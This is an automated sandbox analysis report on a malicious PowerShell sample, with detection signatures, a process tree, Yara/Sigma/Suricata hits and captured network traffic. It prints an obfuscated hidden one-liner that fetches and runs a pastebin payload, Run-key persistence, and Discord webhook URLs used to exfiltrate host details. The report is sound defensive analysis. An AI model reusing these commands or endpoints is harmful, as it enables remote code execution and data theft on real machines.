Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cr_asm_atCAD.ps1

Overview

General Information

Sample name:cr_asm_atCAD.ps1
Analysis ID:1534226
MD5:7a4c9d478466dab6eabf75e7e0c2ffb4
SHA1:2156ef7e9cee3767d71d9f98921fe4aec7bb72de
SHA256:9652251a33ecf9ca8fd76b9168a5459fbdd696889f5c359b20e8e109a308d333
Tags:Neth3Nps1user-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3428 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 4540 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3524 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 1928 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5208 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2944INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xf1a08:$b1: ::WriteAllBytes(
  • 0x22371:$s1: -join
  • 0x223ac:$s1: -join
  • 0x22481:$s1: -join
  • 0x224af:$s1: -join
  • 0x2266b:$s1: -join
  • 0x2268e:$s1: -join
  • 0x22941:$s1: -join
  • 0x22962:$s1: -join
  • 0x22994:$s1: -join
  • 0x229dc:$s1: -join
  • 0x22a09:$s1: -join
  • 0x22a30:$s1: -join
  • 0x22a5b:$s1: -join
  • 0x22a77:$s1: -join
  • 0x22b3e:$s1: -join
  • 0x22fdf:$s1: -join
  • 0x23001:$s1: -join
  • 0x23059:$s1: -join
  • 0x23083:$s1: -join
  • 0x230b7:$s1: -join
Process Memory Space: powershell.exe PID: 5180INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x512f:$b1: ::WriteAllBytes(
  • 0xf7963:$b1: ::WriteAllBytes(
  • 0x14a106:$b1: ::WriteAllBytes(
  • 0x1c9fe:$s1: -join
  • 0x43416:$s1: -join
  • 0x504eb:$s1: -join
  • 0x538bd:$s1: -join
  • 0x53f6f:$s1: -join
  • 0x55a60:$s1: -join
  • 0x57c66:$s1: -join
  • 0x5848d:$s1: -join
  • 0x58cfd:$s1: -join
  • 0x59438:$s1: -join
  • 0x5946a:$s1: -join
  • 0x594b2:$s1: -join
  • 0x594d1:$s1: -join
  • 0x59d21:$s1: -join
  • 0x59e9d:$s1: -join
  • 0x59f15:$s1: -join
  • 0x59fa8:$s1: -join
  • 0x5a20e:$s1: -join
Process Memory Space: powershell.exe PID: 2716INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xc9d18:$b1: ::WriteAllBytes(
  • 0xe893a:$b1: ::WriteAllBytes(
  • 0x6627a:$s1: -join
  • 0xc6617:$s1: -join
  • 0xc6d77:$s1: -join
  • 0x12cdc3:$s1: -join
  • 0x155468:$s1: -join
  • 0x15bd99:$s1: -join
  • 0x1d6b0:$s3: reverse
  • 0x1d99e:$s3: reverse
  • 0x1e0b8:$s3: reverse
  • 0x1e871:$s3: reverse
  • 0x257cd:$s3: reverse
  • 0x25be7:$s3: reverse
  • 0x2676f:$s3: reverse
  • 0x2741c:$s3: reverse
  • 0x4defa:$s3: reverse
  • 0x57268:$s3: reverse
  • 0x10f1bc:$s3: reverse
  • 0x115e3e:$s3: reverse
  • 0x117ce6:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_5180.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd1fa:$b1: ::WriteAllBytes(
  • 0xb8ff:$s1: -join
  • 0x50ab:$s4: +=
  • 0x516d:$s4: +=
  • 0x9394:$s4: +=
  • 0xb4b1:$s4: +=
  • 0xb79b:$s4: +=
  • 0xb8e1:$s4: +=
  • 0xf924:$s4: +=
  • 0xf9a4:$s4: +=
  • 0xfa6a:$s4: +=
  • 0xfaea:$s4: +=
  • 0xfcc0:$s4: +=
  • 0xfd44:$s4: +=
  • 0xd294:$e4: Get-WmiObject
  • 0xd336:$e4: Get-WmiObject
  • 0xde0d:$e4: Get-WmiObject
  • 0xdffc:$e4: Get-Process
  • 0xe054:$e4: Start-Process
amsi64_2716.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 4540, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 3524, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", ProcessId: 2944, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2944, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1", ProcessId: 2944, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T17:58:30.423322+020028576591A Network Trojan was detected192.168.2.849717162.159.136.232443TCP
2024-10-15T17:58:37.042189+020028576591A Network Trojan was detected192.168.2.849718162.159.136.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T17:58:17.350944+020028576581A Network Trojan was detected192.168.2.849710162.159.136.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb< source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb4000052534131000400000100010007d1fa57c4aed9f0a32e84aa0faefd0de9e8fd6aec8f87fb03766c834c99921eb23be79ad9d5dcc1dd9ad236132102900b723cf980957fc4e177108fc607774f29e8320e92ea05ece4e821c0a5efe8f1645c4c0c93c1ab99285d622caa652c1dfad63d745d6f2de5f17e5eaf0fc4 source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\mscorlib.pdb& source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbR, source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbP/,K source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1864209009.000002019A767000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941161276.00000201B4A00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdbi source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb6K source: powershell.exe, 0000000C.00000002.1943252359.00000201B4A11000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbdlll source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1872900029.000001D4FB210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000007.00000002.1873629350.000001D4FB250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.1872900029.000001D4FB210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb9 source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb1934e089$ source: powershell.exe, 0000000C.00000002.1941161276.00000201B4A00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbvice source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CRYPT_DEBUG_FORCE_FREE_LIBRARY.pdb! source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.8:49710 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.8:49717 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.8:49718 -> 162.159.136.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 216Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 216Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 15:58:30 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729007911x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjDcbXOtu8bjtVf6UAQTIHmcX3N1YRay35WRcBJEklTHaXW5y8fHiwFoTubuCmErCybkxzVGv%2F8FR0Jgr1Cu2v4SisBHOZhAuPrV3eN468cKhBsNItqX%2BTH6%2BYQp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=19a8aa67251f730d1a261752bff7f45d45000c44-1729007910; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=sUAjXejYQfsWL.eiu_X9eQrmoyrWjOvVstrleAJG2ZQ-1729007910365-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3102cf2cef461a-DFW
